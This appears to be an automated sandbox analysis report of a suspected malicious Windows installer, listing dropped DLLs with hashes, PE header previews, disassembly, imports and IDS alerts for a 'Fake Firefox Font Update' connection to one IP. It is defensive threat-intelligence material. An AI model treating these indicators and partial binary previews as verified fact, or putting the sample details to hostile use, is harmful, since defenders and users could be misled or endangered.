Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Y?1.8Qb.8Qb.8Qb.@.b.8Qb.fRc.8Qb.fUc.8Qb.fPc.8Qb.fTc.8Qb.ZPc.8Qb.fPc.8Qb.8Pb`;Qb.fTc.8Qb.fQc.8Qb.f.b.8Qb.8.b.8Qb.fSc.8QbRich.8Qb........PE..d.....n].........." .........z...............................................`............`......................................... ...._...#..,....0....... ..T.......x....@.........T......................(...0................... ............................text...7........................... ..`.rdata...=.......>..................@..@.data....4......."..................@....pdata..T.... ......................@..@.gfids..4...........................@..@.tls......... ......................@....rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................

C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\Qt5PrintSupport.dll

Download File

Process:	C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	324216
Entropy (8bit):	6.424811123526958
Encrypted:	false
SSDEEP:	6144:n5BVjwbCL85ofdeA2aqWs+41FwneMKAaol1cafGR27M1ffqp+1eszZnDy4SA:nBjwE8aVK
MD5:	D0634933DB2745397A603D5976BEE8E7
SHA1:	DDEC98433BCFEC1D9E38557D803BC73E1FF883B6
SHA-256:	7D91D3D341DBBA568E2D19382E9D58A42A0D78064C3AD7ADFE3C7BB14742C2B1
SHA-512:	9271370CD22115F68BD62572640525E086A05D75F5BC768F06E20B90B48A182F29A658A07099C7BC1E99BF0FFCF1229709524E2AF6745D6FED7B41C1ADDD09F1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........r.....}...}...}.k.}...}.M.\|...}.M.\|...}.M.\|...}.M.\|...}.q.\|...}zM.\|...}...}...}zM.\|...}zM.\|...}.Mc}...}...}...}zM.\|...}Rich...}................PE..d....n].........." .........................................................0.......H....`..........................................M...p.......................&......x.... ..@.......T.......................(.......................P"...........................text............................... ..`.rdata..............................@..@.data...............................@....pdata...&.......(..................@..@.gfids..4...........................@..@.tls................................@....rsrc...............................@..@.reloc..@.... ......................@..B................................................................................................................................................

C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\Qt5Widgets.dll

Download File

Process:	C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5539448
Entropy (8bit):	6.61165878012579
Encrypted:	false
SSDEEP:	98304:oSIq7lPpagrGUtPm3qBF+1jIJJAi+eVq8:oSI8hagrGUtPm3KMRIL+e/
MD5:	C502BB8A4A7DC3724AB09292CD3C70D6
SHA1:	FF44FDDEEC2D335EC0EAA861714B561F899675FD
SHA-256:	4266918226C680789D49CF2407A7FEC012B0ED872ADAFB84C7719E645F9B2E6D
SHA-512:	73BEF89503CE032FBA278876B7DAB9EAC275632DF7A72C77093D433C932272DA997E8FBEB431A09D84BAAC7B2AB2E55222FF687893311949A5603E738BFA6617
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;....b..b..b.v.H.wb.D<.\|b.D<.ub.D<.{b.D<.hb....ub..<.zb..b.no..<..b..<.~b..<$.~b..bL.~b..<.~b.Rich.b.................PE..d.....n].........." ......3... .......3.......................................T......4U...`......................................... .D.TQ..t>M......@T.......P..e...pT.x....PT.... =@.T....................>@.(....=@...............4..h...........................text.....3.......3................. ..`.rdata........4.......4.............@..@.data........P..~....O.............@....pdata...e....P..f...rP.............@..@.gfids..4.... T.......S.............@..@.tls.........0T.......S.............@....rsrc........@T.......S.............@..@.reloc......PT.......S.............@..B................................................................................................................................................

C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\StarBurn.dll

Download File

Process:	C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1505376
Entropy (8bit):	6.361832549375939
Encrypted:	false
SSDEEP:	24576:NbKpao+9Uybarjs1FHw9guJfkTK39MOCRZnVVWjk+amEObzznf9:NbKpaGEw9diEjkuEObzznf9
MD5:	41E19BA2364F2C834B2487E1D02BB99A
SHA1:	6C61D603DDDFE384A93AD33775B70681D0A396D9
SHA-256:	C040A25377028B0C28DB81A012DE786C803A0E9D6F87CE460335A621D31F5340
SHA-512:	6EBF4A9E80F16C6A03FF357D2DA9A34A4227BFD65EB66D1D335349A77BA066D069BA0D47D46229B3C77B59052C42D388678662F970B418D8CC3CFB1223427D8C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............ho..ho..ho.....ho.....ho.....ho..hn.{ho......ho.....Zho.....ho.....ho......ho......ho......ho.Rich.ho.................PE..d...u.NK.........." .........2...............................................P............@.............................................C6......d............p..$u......`.... ......`...............................................X................................text............................... ..`.data............^..................@....pdata..$u...p...v..................@..@.idata..............................@....rsrc...............................@..@.reloc...&... ...&..................@..B................................................................................................................................................................................................................................................

C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\dcfa

Download File

Process:	C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe
File Type:	data
Category:	dropped
Size (bytes):	4543241
Entropy (8bit):	7.9608931519984845
Encrypted:	false
SSDEEP:	98304:OO7SdW9HUJrRH13FneWNNrxg3XXnD8hrXI678K35sXYIt:52W9OrbVzHrG0T/78K35zIt
MD5:	456596683DAD1217C76D8C0F47B5CFBC
SHA1:	001AE3F937AA75AD2175289C6E8F09561A1CBB35
SHA-256:	A7E578D0F7A5D522E4B4E62864F77CBB1830DC7E7026C9EE0B5F6FA7156C727F
SHA-512:	537420007A4985F2DEB4B2A48AF1BA61CF8CC112359EC1CDBD02DFB8E958AB5AB4EC302CD0698A14D4560AFE6C23627D1D4D080EAC9DAA7CB5EDC7259CB73591
Malicious:	false
Preview:	.t.bs..^Gs.dN...n.......NMLN..PxS.W......Z.Q.I...K.^Q.qlxs...FXT..PN.o.v..N.x.......aq[X.JCuX.P.SRa...cg...U.U\.]`do^jg^..RY.vLX..J.Eq......QnuXU..G.XN.R[....P.YD..m.Q....M.t.b..LnGm..R.ES..e..l._A.Q.e.TDF.s..X.sXBV...QQ.b..Y....G.of....SlexH.l......J..VC.jk]jl.I.g..A...Yl..b]e.....x.of._.]..E_.D.Pwg`x.L.r...r.R.....rZo..F]gv.......AgkL.cy.FmrhnkH....P...I.ACj..PhteI..Yq...vn.Z_..v..oFK.Ng........iE`..^Y..q.s...e....UX..l...h..UB.cf...V...l[wO.GhDsbu.......mF...wI.Og_[.ZO.E..kwn.X_...`Vc_.qQ..h.H...r.fLP.n.PAr.].G..B....U..Y.......S.k.dh...u..FN..b..[..d..WC..p.FM.....q.k.F..bGS....Ij....Lh\h.o_.lU.....et.p...iF...Z.D.....Xu.ylnoCPI...C.sB.yo.NRf.n...._k.tuoa._..G..jTx.U.I..L...PQm._.k....rA.Yk.LV.`..A.K..e....X..BFR.dk.Kk.E..bC.WdJ.bYDu....P.eD..\f..GQ`Pgv.c..tn.DG.o..Ey.g\T.E..t.J.`...G....K..`.u]l.aaV.REyBRF.....N..O..t.T\..uuq..u..d..rG...E.R..fs..jj.....VOgA.D...y..Uu`.cIJ.P..B..]N......XQ.aH..Ln]Z.x.t.m..s..].._..y..[.tuV..\....H.g.t...VK.T.l....mn\..Z.m.X_U.^V.f.S.lII.BU.n.h....

C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\msvcp140.dll

Download File

Process:	C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	571312
Entropy (8bit):	6.492350759123951
Encrypted:	false
SSDEEP:	12288:Rsjw3shF+jss1I8CgEWTe5+YMCMGz2MMY5U489wiyaf+QEKZm+jWodEEVksLd:Rs/5U4RBaf+QEKZm+jWodEECsL
MD5:	7DB24201EFEA565D930B7EC3306F4308
SHA1:	880C8034B1655597D0EEBE056719A6F79B60E03C
SHA-256:	72FE4598F0B75D31CE2DC621E8EF161338C6450BB017CD06895745690603729E
SHA-512:	BAC5729A3EB53E9BC7B680671D028CABEF5EA102DFAA48A7C453B67F8ECB358DB9F8FB16B3B1D9EA5A2DFF34F459F6AC87F3A563C736D81D31048766198FF11E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T4...U...U...U...'...U...-8..U...U...U..p/...U..p/...U..p/...U..p/...U..p/...U..p/T..U..p/...U..Rich.U..........PE..d...,pd..........." ... .H...b.......3..............................................r.....`A.........................................H..h...."..,...............8:.......'......8.......p...........................@...@............`...............................text....G.......H.................. ..`.rdata..b....`.......L..............@..@.data...P:...@.......(..............@....pdata..8:.......<...F..............@..@.rsrc...............................@..@.reloc..8...........................@..B................................................................................................................................................................................................................................................................

C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\vcruntime140.dll

Download File

Process:	C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	98736
Entropy (8bit):	6.474996871326343
Encrypted:	false
SSDEEP:	1536:BxhUQePlHhR46rXHHGI+mAAD4AeDuXMycecb8i10DWZz:Bvk4wHH+mZD4ADAecb8G1
MD5:	F12681A472B9DD04A812E16096514974
SHA1:	6FD102EB3E0B0E6EEF08118D71F28702D1A9067C
SHA-256:	D66C3B47091CEB3F8D3CC165A43D285AE919211A0C0FCB74491EE574D8D464F8
SHA-512:	7D3ACCBF84DE73FB0C5C0DE812A9ED600D39CD7ED0F99527CA86A57CE63F48765A370E913E3A46FFC2CCD48EE07D823DAFDD157710EEF9E7CC1EB7505DC323A2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.&k..H8..H8..H8.I9..H8...8..H8..I8(.H8e.K9..H8e.L9..H8e.M9..H8e.H9..H8e..8..H8e.J9..H8Rich..H8................PE..d....9............" ... .....`......`.....................................................`A........................................0C..4...dK...............p..p....Z...'...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......B..............@....pdata..p....p.......F..............@..@_RDATA..\............R..............@..@.rsrc................T..............@..@.reloc...............X..............@..B........................................................................................................................................................................................................................

C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\vcruntime140_1.dll

Download File

Process:	C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	38304
Entropy (8bit):	6.3923853431578035
Encrypted:	false
SSDEEP:	768:Xhh4pTUUtmUwqiu8oSRjez6SD7GkxZYj/9zLUr:xJ9x70GkxuZz2
MD5:	75E78E4BF561031D39F86143753400FF
SHA1:	324C2A99E39F8992459495182677E91656A05206
SHA-256:	1758085A61527B427C4380F0C976D29A8BEE889F2AC480C356A3F166433BF70E
SHA-512:	CE4DAF46BCE44A89D21308C63E2DE8B757A23BE2630360209C4A25EB13F1F66A04FBB0A124761A33BBF34496F2F2A02B8DF159B4B62F1B6241E1DBFB0E5D9756
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L......................h.........G.........:...h.......h.......h.......h.......h.+.....h.......Rich............................PE..d................." ... .:...6.......A..............................................B.....`A.........................................m.......m..x....................n...'......D....c..p...........................`b..@............P..`............................text....9.......:.................. ..`.rdata..."...P...$...>..............@..@.data................b..............@....pdata...............d..............@..@.rsrc................h..............@..@.reloc..D............l..............@..B................................................................................................................................................................................................................................................

C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\vechpt

Download File

Process:	C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe
File Type:	data
Category:	dropped
Size (bytes):	15745
Entropy (8bit):	6.185378376185804
Encrypted:	false
SSDEEP:	384:l/Yzs6zZ+ic3FE2IUZmwKy8mfOCdLnryfBsFhs:lgzsITfkmwKy8ZhKFW
MD5:	DD899CA13E5BEF55BCEA07E167DA891B
SHA1:	E883F0240F127520486F063B033FB34FA2DFE5C1
SHA-256:	A818D6FA8CADDAA608345EA40B75073A7C98637161794918566E2DDEEEDE47E7
SHA-512:	E38437899FCC433EF89A04C6A68684EA5110181AF48A4699836939CF167D0C1FE7932432518445E90ACBCBC151EE324D77DE064147D97FDEDF6ECABAAC788C06
Malicious:	false
Preview:	.m.c.T^YvvPEcE..l.avS...P.._..h..Dlx.hCl.fu......Ih.f...B..JIR..pG.c.G.iaX.g.d..T...u\.r..].Uu.V...k..R.WXwsZx.QMQ..S.r..^...ZZ.b.a...n`jfH.`]SKoUQw..D.......s...tY..OT.b..lENXo.p...Hd.RWjEw.......Y..u.C.......rp.a.V.oN\c_UC.ox.Q......X....YwX..tkn.V...g.W^c._B....EdgW.gu.YN..ICA.p.....Z.o.ev.N..tH....pyyLt.T..A.XHk.duaxpkY.AUT.....gp.TCn..Sxjm...EM...Cb[U.t.ZGlC.c.dT.mYl...R.nJ.....drk..qLuv.y.q..COa.....D....hU._..e.....^]..C.X..IP.Z.BXf.X.b....y.QwB.txZ..^B.....Mp\j...Z.il.f...UQ.x.e`.^.....Mw.Z....ud[oVNa..d..o.HJsP.wY...Af...A.M.Ur.X..S.i[j..VE...I..iiqH...s^...B.I..ZV....`rUNP.....n...JS..Qq..R..Qvar...Z.Ce..Vac[S...I.[.D.....D.qWS.k.V]vG.EVLk..v.XwoA....w..lE.n.m..UPm.Iai.u.......kAhf.Q.n.t.g.v.^P..c._.hC\b.cpc..L.......o...C`.`Q.O..NF.[.V.e..U\hj.X.u.ZHnL.f.....SAm.G..X]..X.FJ....K.....j[..e.ndEI..cDq..bB.a.fDX...YK....Tm.rAK.......I......HotwdB..K.v^qM.mM.`Rc..LI..LKR.......Rv.L....qO....`l..vG.Vjt.N...If[..A..`....h...t.t]...b..re.fm.PqOik.faF.U.J..X..FKG.\H.B..I..WXA._..R.N.

C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe

Download File

Process:	C:\Users\user\Desktop\BkTwXj17DH.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	14413036
Entropy (8bit):	7.994348334212812
Encrypted:	true
SSDEEP:	393216:iV02/4ExIEv64hlETqr+lUjUTRbjrA80VjPmk:iC2/Px/vxgWClU4TtjqVb9
MD5:	EB26DFA5E4E3170D90B5629DF0715AA9
SHA1:	BBC10367AA29AA36A6E53C63B60A6936BC6F1720
SHA-256:	70721A20760818839C7EF0CE2D684666BD07BBB79B87415944C6EFBCE58F7906
SHA-512:	11E2683C8F47C62548050F863386E62908C5DD7E456CA13C22644ECB984533D3ABDD72D1FD5A3AC53C1B2734E5999554D383F3F5C615D4C94C4C169664787BF9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A!.S.@...@...@......@.....y@......@..."\|..@..."{..@..."z.#@...8...@...8...@...@~.PA...#z.N@...#...@...@...@...#}..@..Rich.@..................PE..L......Z.....................r....................@..........................P............@..............................................9.......................=..Pv..T....................v......0p..@...................4........................text...7........................... ..`.rdata..`...........................@..@.data...0...........................@....wixburn8...........................@..@.rsrc....9.......:..................@..@.reloc...=.......>..................@..B................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.994390816827148
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	BkTwXj17DH.exe
File size:	14'489'740 bytes
MD5:	b6ab13b3b9903bf84327737ba227bab3
SHA1:	65dff8665b502ba33f3effb8430263e4f906c1c0
SHA256:	baa56e574d8deed445d0e58487add9d429d60bbb1b39943c581bcf50e9bd91d6
SHA512:	6f6ec1217e14f96a52cfa314327a09bfe74199fa0a85d94f0bd5381a0af7c96ac26ba8b5506663f76473c0714609c80d58cb86bde73888cfd6ea15060793f5c7
SSDEEP:	393216:iV02/4ExIEv64hlETqr+lUjUTRbjrA80VjPmd:iC2/Px/vxgWClU4TtjqVb8
TLSH:	13E63331D6414075FAF5057AE83891306E6CA3352399CC7EF2C8EE5C7DA4891ABF7286
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A!.S.@...@...@.......@......y@.......@..."\|..@..."{..@..."z.#@...8...@...8...@...@~.PA...#z.N@...#...@...@...@...#}..@..Rich.@.

File Icon


Icon Hash:	2d2e3797b32b2b99

Static PE Info

General

Entrypoint:	0x42e2a6
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP, NET_RUN_FROM_SWAP
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x5A10AD86 [Sat Nov 18 22:00:38 2017 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	d7e2fd259780271687ffca462b9e69b7

Entrypoint Preview

Instruction
call 00007F9284D6FD7Fh
jmp 00007F9284D6F6F3h
mov eax, dword ptr [esp+08h]
mov ecx, dword ptr [esp+10h]
or ecx, eax
mov ecx, dword ptr [esp+0Ch]
jne 00007F9284D6F86Bh
mov eax, dword ptr [esp+04h]
mul ecx
retn 0010h
push ebx
mul ecx
mov ebx, eax
mov eax, dword ptr [esp+08h]
mul dword ptr [esp+14h]
add ebx, eax
mov eax, dword ptr [esp+08h]
mul ecx
add edx, ebx
pop ebx
retn 0010h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
cmp cl, 00000040h
jnc 00007F9284D6F877h
cmp cl, 00000020h
jnc 00007F9284D6F868h
shrd eax, edx, cl
shr edx, cl
ret
mov eax, edx
xor edx, edx
and cl, 0000001Fh
shr eax, cl
ret
xor eax, eax
xor edx, edx
ret
push ebp
mov ebp, esp
jmp 00007F9284D6F86Fh
push dword ptr [ebp+08h]
call 00007F9284D760ECh
pop ecx
test eax, eax
je 00007F9284D6F871h
push dword ptr [ebp+08h]
call 00007F9284D76175h
pop ecx
test eax, eax
je 00007F9284D6F848h
pop ebp
ret
cmp dword ptr [ebp+08h], FFFFFFFFh
je 00007F9284D70104h
jmp 00007F9284D700E1h
push ebp
mov ebp, esp
push dword ptr [ebp+08h]
call 00007F9284D7011Dh
pop ecx
pop ebp
ret
push ebp
mov ebp, esp
test byte ptr [ebp+08h], 00000001h
push esi
mov esi, ecx
mov dword ptr [esi], 00460DB8h
je 00007F9284D6F86Ch
push 0000000Ch
push esi
call 00007F9284D6F83Dh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x686b4	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x6d000	0x39fc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x71000	0x3dfc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x67650	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x676a4	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x67030	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x4b000	0x3e0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x68234	0x100	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x49937	0x49a00	2319c0baa707bb66cc0bc08c55a13d8c	False	0.5314688561120543	data	6.570006046413636	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x4b000	0x1ed60	0x1ee00	8ad6c4e18165c6d8ccdc97bab683438d	False	0.3136386639676113	data	5.114228301263695	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x6a000	0x1730	0xa00	00fde973df27dc2d36084e16d6dddbdf	False	0.274609375	firmware 2005 v9319 (revision 0) N\346@\273\261\031\277D V2, 0 bytes or less, UNKNOWN2 0xffffffff, at 0 0 bytes , at 0 0 bytes , at 0x20a14600	3.1526594027632213	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.wixburn	0x6c000	0x38	0x200	b6095db2b47dafcaa6abee9b179ca58d	False	0.109375	data	0.5774028516060967	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x6d000	0x39fc	0x3a00	417d734fce1056dcd5c1b011e138eaa0	False	0.34011314655172414	data	5.466249017927149	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x71000	0x3dfc	0x3e00	dd2c47fa48872886af4c9a2e5bd90ccc	False	0.8097278225806451	data	6.794335469567533	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x6d178	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.43185920577617326
RT_MESSAGETABLE	0x6da20	0x2840	data	English	United States	0.28823757763975155
RT_GROUP_ICON	0x70260	0x14	data	English	United States	1.15
RT_VERSION	0x70274	0x2b4	data	English	United States	0.48554913294797686
RT_MANIFEST	0x70528	0x4d2	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (1174), with CRLF line terminators	English	United States	0.47568881685575365

Imports

DLL	Import
ADVAPI32.dll	RegCloseKey, RegOpenKeyExW, OpenProcessToken, AdjustTokenPrivileges, LookupPrivilegeValueW, InitiateSystemShutdownExW, GetUserNameW, RegQueryValueExW, RegDeleteValueW, CloseEventLog, OpenEventLogW, ReportEventW, ConvertStringSecurityDescriptorToSecurityDescriptorW, DecryptFileW, CreateWellKnownSid, InitializeAcl, SetEntriesInAclW, ChangeServiceConfigW, CloseServiceHandle, ControlService, OpenSCManagerW, OpenServiceW, QueryServiceStatus, SetNamedSecurityInfoW, CheckTokenMembership, AllocateAndInitializeSid, SetEntriesInAclA, SetSecurityDescriptorGroup, SetSecurityDescriptorOwner, SetSecurityDescriptorDacl, InitializeSecurityDescriptor, RegSetValueExW, RegQueryInfoKeyW, RegEnumValueW, RegEnumKeyExW, RegDeleteKeyW, RegCreateKeyExW, GetTokenInformation, CryptDestroyHash, CryptHashData, CryptCreateHash, CryptGetHashParam, CryptReleaseContext, CryptAcquireContextW, QueryServiceConfigW
USER32.dll	PeekMessageW, PostMessageW, IsWindow, WaitForInputIdle, PostQuitMessage, GetMessageW, TranslateMessage, MsgWaitForMultipleObjects, PostThreadMessageW, GetMonitorInfoW, MonitorFromPoint, IsDialogMessageW, LoadCursorW, LoadBitmapW, SetWindowLongW, GetWindowLongW, GetCursorPos, MessageBoxW, CreateWindowExW, UnregisterClassW, RegisterClassW, DefWindowProcW, DispatchMessageW
OLEAUT32.dll	VariantInit, SysAllocString, VariantClear, SysFreeString
GDI32.dll	DeleteDC, DeleteObject, SelectObject, StretchBlt, GetObjectW, CreateCompatibleDC
SHELL32.dll	CommandLineToArgvW, SHGetFolderPathW, ShellExecuteExW
ole32.dll	CoUninitialize, CoInitializeEx, CoInitialize, StringFromGUID2, CoCreateInstance, CoTaskMemFree, CLSIDFromProgID, CoInitializeSecurity
KERNEL32.dll	GetCommandLineA, GetCPInfo, GetOEMCP, CloseHandle, CreateFileW, GetProcAddress, LocalFree, HeapSetInformation, GetLastError, GetModuleHandleW, FormatMessageW, lstrlenA, lstrlenW, MultiByteToWideChar, WideCharToMultiByte, LCMapStringW, Sleep, GetLocalTime, GetModuleFileNameW, ExpandEnvironmentStringsW, GetTempPathW, GetTempFileNameW, CreateDirectoryW, GetFullPathNameW, CompareStringW, GetCurrentProcessId, WriteFile, SetFilePointer, LoadLibraryW, GetSystemDirectoryW, CreateFileA, HeapAlloc, HeapReAlloc, HeapFree, HeapSize, GetProcessHeap, FindClose, GetCommandLineW, GetCurrentDirectoryW, RemoveDirectoryW, SetFileAttributesW, GetFileAttributesW, DeleteFileW, FindFirstFileW, FindNextFileW, MoveFileExW, GetCurrentProcess, GetCurrentThreadId, InitializeCriticalSection, DeleteCriticalSection, ReleaseMutex, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, CreateProcessW, GetVersionExW, VerSetConditionMask, FreeLibrary, EnterCriticalSection, LeaveCriticalSection, GetSystemTime, GetNativeSystemInfo, GetModuleHandleExW, GetWindowsDirectoryW, GetSystemWow64DirectoryW, GetEnvironmentStringsW, VerifyVersionInfoW, GetVolumePathNameW, GetDateFormatW, GetUserDefaultUILanguage, GetSystemDefaultLangID, GetUserDefaultLangID, GetStringTypeW, ReadFile, SetFilePointerEx, DuplicateHandle, InterlockedExchange, InterlockedCompareExchange, LoadLibraryExW, CreateEventW, ProcessIdToSessionId, OpenProcess, GetProcessId, WaitForSingleObject, ConnectNamedPipe, SetNamedPipeHandleState, CreateNamedPipeW, CreateThread, GetExitCodeThread, SetEvent, WaitForMultipleObjects, InterlockedIncrement, InterlockedDecrement, ResetEvent, SetEndOfFile, SetFileTime, LocalFileTimeToFileTime, DosDateTimeToFileTime, CompareStringA, GetExitCodeProcess, SetThreadExecutionState, CopyFileExW, MapViewOfFile, UnmapViewOfFile, CreateMutexW, CreateFileMappingW, GetThreadLocale, IsValidCodePage, FindFirstFileExW, FreeEnvironmentStringsW, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, DecodePointer, WriteConsoleW, GetModuleHandleA, GlobalAlloc, GlobalFree, GetFileSizeEx, CopyFileW, VirtualAlloc, VirtualFree, SystemTimeToTzSpecificLocalTime, GetTimeZoneInformation, SystemTimeToFileTime, GetSystemInfo, VirtualProtect, VirtualQuery, GetComputerNameW, SetCurrentDirectoryW, GetFileType, GetACP, ExitProcess, GetStdHandle, InitializeCriticalSectionAndSpinCount, SetLastError, RtlUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RaiseException, LoadLibraryExA
RPCRT4.dll	UuidCreate

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-14T19:57:45.902270+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	58009	188.114.96.3	443	TCP
2024-11-14T19:57:48.217330+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	58010	188.114.96.3	443	TCP
2024-11-14T19:57:49.423652+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	58011	188.114.96.3	443	TCP
2024-11-14T19:57:53.226778+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	58013	188.114.96.3	443	TCP
2024-11-14T19:57:55.114167+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	58014	188.114.96.3	443	TCP
2024-11-14T19:57:56.355855+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	58015	188.114.96.3	443	TCP
2024-11-14T19:57:57.906772+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	58016	188.114.96.3	443	TCP
